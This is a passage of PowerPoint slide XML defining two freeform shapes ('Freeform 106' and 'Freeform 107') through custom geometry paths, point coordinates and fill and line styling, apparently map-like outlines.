                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="135"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36374" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3087" y="3075"/>
                <a:ext cx="186" cy="161"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 186"/>
                  <a:gd name="T1" fmla="*/ 138 h 161"/>
                  <a:gd name="T2" fmla="*/ 0 w 186"/>
                  <a:gd name="T3" fmla="*/ 128 h 161"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 94 h 161"/>
                  <a:gd name="T6" fmla="*/ 25 w 186"/>
                  <a:gd name="T7" fmla="*/ 77 h 161"/>
                  <a:gd name="T8" fmla="*/ 30 w 186"/>
                  <a:gd name="T9" fmla="*/ 72 h 161"/>
                  <a:gd name="T10" fmla="*/ 34 w 186"/>
                  <a:gd name="T11" fmla="*/ 64 h 161"/>
                  <a:gd name="T12" fmla="*/ 32 w 186"/>
                  <a:gd name="T13" fmla="*/ 45 h 161"/>
                  <a:gd name="T14" fmla="*/ 41 w 186"/>
                  <a:gd name="T15" fmla="*/ 51 h 161"/>
                  <a:gd name="T16" fmla="*/ 51 w 186"/>
                  <a:gd name="T17" fmla="*/ 48 h 161"/>
                  <a:gd name="T18" fmla="*/ 66 w 186"/>
                  <a:gd name="T19" fmla="*/ 59 h 161"/>
                  <a:gd name="T20" fmla="*/ 77 w 186"/>
                  <a:gd name="T21" fmla="*/ 60 h 161"/>
                  <a:gd name="T22" fmla="*/ 88 w 186"/>
                  <a:gd name="T23" fmla="*/ 63 h 161"/>
                  <a:gd name="T24" fmla="*/ 100 w 186"/>
                  <a:gd name="T25" fmla="*/ 69 h 161"/>
                  <a:gd name="T26" fmla="*/ 110 w 186"/>
                  <a:gd name="T27" fmla="*/ 82 h 161"/>
                  <a:gd name="T28" fmla="*/ 125 w 186"/>
                  <a:gd name="T29" fmla="*/ 84 h 161"/>
                  <a:gd name="T30" fmla="*/ 124 w 186"/>
                  <a:gd name="T31" fmla="*/ 64 h 161"/>
                  <a:gd name="T32" fmla="*/ 118 w 186"/>
                  <a:gd name="T33" fmla="*/ 67 h 161"/>
                  <a:gd name="T34" fmla="*/ 105 w 186"/>
                  <a:gd name="T35" fmla="*/ 59 h 161"/>
                  <a:gd name="T36" fmla="*/ 103 w 186"/>
                  <a:gd name="T37" fmla="*/ 45 h 161"/>
                  <a:gd name="T38" fmla="*/ 104 w 186"/>
                  <a:gd name="T39" fmla="*/ 17 h 161"/>
                  <a:gd name="T40" fmla="*/ 113 w 186"/>
                  <a:gd name="T41" fmla="*/ 4 h 161"/>
                  <a:gd name="T42" fmla="*/ 143 w 186"/>
                  <a:gd name="T43" fmla="*/ 5 h 161"/>
                  <a:gd name="T44" fmla="*/ 160 w 186"/>
                  <a:gd name="T45" fmla="*/ 13 h 161"/>
                  <a:gd name="T46" fmla="*/ 179 w 186"/>
                  <a:gd name="T47" fmla="*/ 22 h 161"/>
                  <a:gd name="T48" fmla="*/ 186 w 186"/>
                  <a:gd name="T49" fmla="*/ 37 h 161"/>
                  <a:gd name="T50" fmla="*/ 180 w 186"/>
                  <a:gd name="T51" fmla="*/ 43 h 161"/>
                  <a:gd name="T52" fmla="*/ 180 w 186"/>
                  <a:gd name="T53" fmla="*/ 62 h 161"/>
                  <a:gd name="T54" fmla="*/ 186 w 186"/>
                  <a:gd name="T55" fmla="*/ 66 h 161"/>
                  <a:gd name="T56" fmla="*/ 175 w 186"/>
                  <a:gd name="T57" fmla="*/ 72 h 161"/>
                  <a:gd name="T58" fmla="*/ 171 w 186"/>
                  <a:gd name="T59" fmla="*/ 86 h 161"/>
                  <a:gd name="T60" fmla="*/ 177 w 186"/>
                  <a:gd name="T61" fmla="*/ 93 h 161"/>
                  <a:gd name="T62" fmla="*/ 149 w 186"/>
                  <a:gd name="T63" fmla="*/ 104 h 161"/>
                  <a:gd name="T64" fmla="*/ 133 w 186"/>
                  <a:gd name="T65" fmla="*/ 113 h 161"/>
                  <a:gd name="T66" fmla="*/ 131 w 186"/>
                  <a:gd name="T67" fmla="*/ 119 h 161"/>
                  <a:gd name="T68" fmla="*/ 113 w 186"/>
                  <a:gd name="T69" fmla="*/ 125 h 161"/>
                  <a:gd name="T70" fmla="*/ 110 w 186"/>
                  <a:gd name="T71" fmla="*/ 135 h 161"/>
                  <a:gd name="T72" fmla="*/ 96 w 186"/>
                  <a:gd name="T73" fmla="*/ 138 h 161"/>
                  <a:gd name="T74" fmla="*/ 85 w 186"/>
                  <a:gd name="T75" fmla="*/ 153 h 161"/>
                  <a:gd name="T76" fmla="*/ 70 w 186"/>
                  <a:gd name="T77" fmla="*/ 159 h 161"/>
                  <a:gd name="T78" fmla="*/ 61 w 186"/>
                  <a:gd name="T79" fmla="*/ 160 h 161"/>
                  <a:gd name="T80" fmla="*/ 52 w 186"/>
                  <a:gd name="T81" fmla="*/ 158 h 161"/>
                  <a:gd name="T82" fmla="*/ 49 w 186"/>
                  <a:gd name="T83" fmla="*/ 155 h 161"/>
                  <a:gd name="T84" fmla="*/ 36 w 186"/>
                  <a:gd name="T85" fmla="*/ 151 h 161"/>
                  <a:gd name="T86" fmla="*/ 21 w 186"/>
                  <a:gd name="T87" fmla="*/ 153 h 1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86"/>
                  <a:gd name="T133" fmla="*/ 0 h 161"/>
                  <a:gd name="T134" fmla="*/ 186 w 186"/>
                  <a:gd name="T135" fmla="*/ 161 h 161"/>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86" h="161">
                    <a:moveTo>
                      <a:pt x="21" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="153"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36375" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3087" y="3075"/>
                <a:ext cx="186" cy="161"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 186"/>
                  <a:gd name="T1" fmla="*/ 138 h 161"/>
                  <a:gd name="T2" fmla="*/ 0 w 186"/>
                  <a:gd name="T3" fmla="*/ 128 h 161"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 94 h 161"/>
                  <a:gd name="T6" fmla="*/ 25 w 186"/>
                  <a:gd name="T7" fmla="*/ 77 h 161"/>
                  <a:gd name="T8" fmla="*/ 30 w 186"/>
                  <a:gd name="T9" fmla="*/ 72 h 161"/>
                  <a:gd name="T10" fmla="*/ 34 w 186"/>
                  <a:gd name="T11" fmla="*/ 64 h 161"/>
                  <a:gd name="T12" fmla="*/ 32 w 186"/>
                  <a:gd name="T13" fmla="*/ 45 h 161"/>
                  <a:gd name="T14" fmla="*/ 41 w 186"/>
                  <a:gd name="T15" fmla="*/ 51 h 161"/>
                  <a:gd name="T16" fmla="*/ 51 w 186"/>
                  <a:gd name="T17" fmla="*/ 48 h 161"/>
                  <a:gd name="T18" fmla="*/ 66 w 186"/>
                  <a:gd name="T19" fmla="*/ 59 h 161"/>
                  <a:gd name="T20" fmla="*/ 77 w 186"/>
                  <a:gd name="T21" fmla="*/ 60 h 161"/>
                  <a:gd name="T22" fmla="*/ 88 w 186"/>
                  <a:gd name="T23" fmla="*/ 63 h 161"/>
                  <a:gd name="T24" fmla="*/ 100 w 186"/>
                  <a:gd name="T25" fmla="*/ 69 h 161"/>
                  <a:gd name="T26" fmla="*/ 110 w 186"/>
                  <a:gd name="T27" fmla="*/ 82 h 161"/>
                  <a:gd name="T28" fmla="*/ 125 w 186"/>
                  <a:gd name="T29" fmla="*/ 84 h 161"/>
                  <a:gd name="T30" fmla="*/ 124 w 186"/>
                  <a:gd name="T31" fmla="*/ 64 h 161"/>
                  <a:gd name="T32" fmla="*/ 118 w 186"/>
                  <a:gd name="T33" fmla="*/ 67 h 161"/>
                  <a:gd name="T34" fmla="*/ 105 w 186"/>
                  <a:gd name="T35" fmla="*/ 59 h 161"/>
                  <a:gd name="T36" fmla="*/ 103 w 186"/>
                  <a:gd name="T37" fmla="*/ 45 h 161"/>
                  <a:gd name="T38" fmla="*/ 104 w 186"/>
                  <a:gd name="T39" fmla="*/ 17 h 161"/>
                  <a:gd name="T40" fmla="*/ 113 w 186"/>
                  <a:gd name="T41" fmla="*/ 4 h 161"/>
                  <a:gd name="T42" fmla="*/ 143 w 186"/>
                  <a:gd name="T43" fmla="*/ 5 h 161"/>
                  <a:gd name="T44" fmla="*/ 160 w 186"/>
                  <a:gd name="T45" fmla="*/ 13 h 161"/>
                  <a:gd name="T46" fmla="*/ 179 w 186"/>
                  <a:gd name="T47" fmla="*/ 22 h 161"/>
                  <a:gd name="T48" fmla="*/ 186 w 186"/>
                  <a:gd name="T49" fmla="*/ 37 h 161"/>
                  <a:gd name="T50" fmla="*/ 180 w 186"/>
                  <a:gd name="T51" fmla="*/ 43 h 161"/>
                  <a:gd name="T52" fmla="*/ 180 w 186"/>
                  <a:gd name="T53" fmla="*/ 62 h 161"/>
                  <a:gd name="T54" fmla="*/ 186 w 186"/>
                  <a:gd name="T55" fmla="*/ 66 h 161"/>
                  <a:gd name="T56" fmla="*/ 175 w 186"/>
                  <a:gd name="T57" fmla="*/ 72 h 161"/>
                  <a:gd name="T58" fmla="*/ 171 w 186"/>
                  <a:gd name="T59" fmla="*/ 86 h 161"/>
                  <a:gd name="T60" fmla="*/ 177 w 186"/>
                  <a:gd name="T61" fmla="*/ 93 h 161"/>
                  <a:gd name="T62" fmla="*/ 149 w 186"/>
                  <a:gd name="T63" fmla="*/ 104 h 161"/>
                  <a:gd name="T64" fmla="*/ 133 w 186"/>
                  <a:gd name="T65" fmla="*/ 113 h 161"/>
                  <a:gd name="T66" fmla="*/ 131 w 186"/>
                  <a:gd name="T67" fmla="*/ 119 h 161"/>
                  <a:gd name="T68" fmla="*/ 113 w 186"/>
                  <a:gd name="T69" fmla="*/ 125 h 161"/>
                  <a:gd name="T70" fmla="*/ 110 w 186"/>
                  <a:gd name="T71" fmla="*/ 135 h 161"/>
                  <a:gd name="T72" fmla="*/ 96 w 186"/>
                  <a:gd name="T73" fmla="*/ 138 h 161"/>
                  <a:gd name="T74" fmla="*/ 85 w 186"/>
                  <a:gd name="T75" fmla="*/ 153 h 161"/>
                  <a:gd name="T76" fmla="*/ 70 w 186"/>
                  <a:gd name="T77" fmla="*/ 159 h 161"/>
                  <a:gd name="T78" fmla="*/ 61 w 186"/>
                  <a:gd name="T79" fmla="*/ 160 h 161"/>
                  <a:gd name="T80" fmla="*/ 52 w 186"/>
                  <a:gd name="T81" fmla="*/ 158 h 161"/>
                  <a:gd name="T82" fmla="*/ 49 w 186"/>
                  <a:gd name="T83" fmla="*/ 155 h 161"/>
                  <a:gd name="T84" fmla="*/ 36 w 186"/>
                  <a:gd name="T85" fmla="*/ 151 h 161"/>
                  <a:gd name="T86" fmla="*/ 21 w 186"/>
                  <a:gd name="T87" fmla="*/ 153 h 1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86"/>
                  <a:gd name="T133" fmla="*/ 0 h 161"/>
                  <a:gd name="T134" fmla="*/ 186 w 186"/>
                  <a:gd name="T135" fmla="*/ 161 h 161"/>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86" h="161">
                    <a:moveTo>
                      <a:pt x="21" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="66"/>
                    </a:lnTo>
